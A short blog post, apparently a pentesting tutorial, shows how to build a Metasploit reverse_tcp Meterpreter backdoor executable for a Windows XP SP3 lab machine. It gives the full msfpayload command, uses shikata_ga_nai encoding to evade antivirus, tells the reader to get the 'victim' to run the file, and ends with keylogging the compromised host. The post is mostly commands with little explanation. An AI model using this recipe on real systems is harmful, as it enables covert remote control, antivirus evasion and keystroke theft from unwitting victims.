본문 바로가기

Research/Pentesting

[Pentesting] XP sp3 Exploit with Backdoor

- Exploit Windows XP sp3 with Backdoor

 

PayLoad : windows/meterpreter/reverse_tcp

 

Platforms : Windows 

 

Architectures : x86

 

Target : 192.168.233.130 ( Windows XP sp3 )

 

Attacker : 192.168.233.129 ( Linux BackTrack5-R3 )

  

 

- Process -

1.  Using windows/meterpreter/reverse_tcp payload, to make backdoor 

[ "msfencode -l"  cmd ]

 

 

 msfpayload [PayLoad] [LHOST=   ] [LPORT= ] x

-> Creating EXE file which executes selected payload

And I use shikata_ga_nai encryption algorithm to avoid AV's detection

 

U can check the encryption algorithm, just type "msfencode -l" on msf terminal

 

or u can simply make backdoor, right down the cmd

msfpayload windows/meterpreter/reverse_tcp LHOST=[yourIP] LPORT=[port what u want] x > [FileName]

 

 

After making the backdoor is finished, let the victim execute the backdoor

 

 

 

After than...

 

 

Setting Payload and LPORT , LHOST  and.. EXploit!

 

AFter Exploiting, you can send any command to the victim

 

For Ex, u can key-logging


like this....

 

- end